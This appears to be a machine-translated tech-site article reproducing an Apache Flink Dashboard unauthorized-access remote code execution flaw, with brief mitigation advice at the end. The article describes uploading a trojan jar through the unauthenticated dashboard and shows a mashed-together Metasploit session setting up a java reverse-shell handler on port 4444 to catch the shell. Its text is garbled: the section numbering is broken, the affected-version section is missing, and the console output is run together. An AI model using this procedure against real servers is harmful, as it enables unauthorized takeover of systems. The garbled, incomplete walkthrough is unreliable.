Shulou(Shulou.com)05/31 Report--

The content of this article mainly focuses on the reproduction of Apache Flink unauthorized access to remote code command execution. The content of the article is clear and clear. It is very suitable for beginners to learn and is worth reading. Interested friends can follow the editor to read together. I hope you can get something through this article!

Apache Flink unauthorized access-remote code command execution vulnerability recurrence

Apache Flink Dashboard does not have user rights authentication by default. Attackers can upload Trojan jar packages directly through unauthorized Flink Dashboard console and remotely execute arbitrary system commands to gain server privileges, which is of great risk.

Second, influence the version

Apache Flink rce.jar

2. Msf configuration monitoring

Msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf5exploit (multi/handler) > set payload java/shell/reverse_tcp payload= > java/shell/reverse_tcpmsf5exploit (multi/handler) > show options Moduleoptions (exploit/multi/handler): NameCurrent Setting Required Description- Payloadoptions (java/shell/reverse_tcp): NameCurrent Setting Required Description- -LHOSTyes The listen address (an interface may be specified) LPORT4444 yes The listen portExploittarget:IdName-0Wildcard Targetmsf5exploit (multi/handler) > set LHOST XX.XX.XX.XXLHOST= > XX.XX.XX.XXmsf5exploit (multi/handler) > exploit [*] Started reverse TCP handler on XX.XX.XX.XX:4444

3. Upload the Jar package and submit it

Listen to the shell that accepts the rebound to gain permission

IV. Safety recommendations

1. Please follow the Apache Flink official for updated information: https://flink.apache.org/

two。 Set a firewall policy for ApacheFlinkDashboard (prohibit Dashboard access, or ensure that only trusted endpoints are open), allow only whitelist IP access, and add Digest authentication to the service in the Web proxy to prevent unauthorized access.

Thank you for your reading. I believe you have some understanding of the problem of "Apache Flink unauthorized access to the reproduction of remote code command execution". Go to practice quickly, if you want to know more related knowledge points, you can follow the website! The editor will continue to bring you better articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.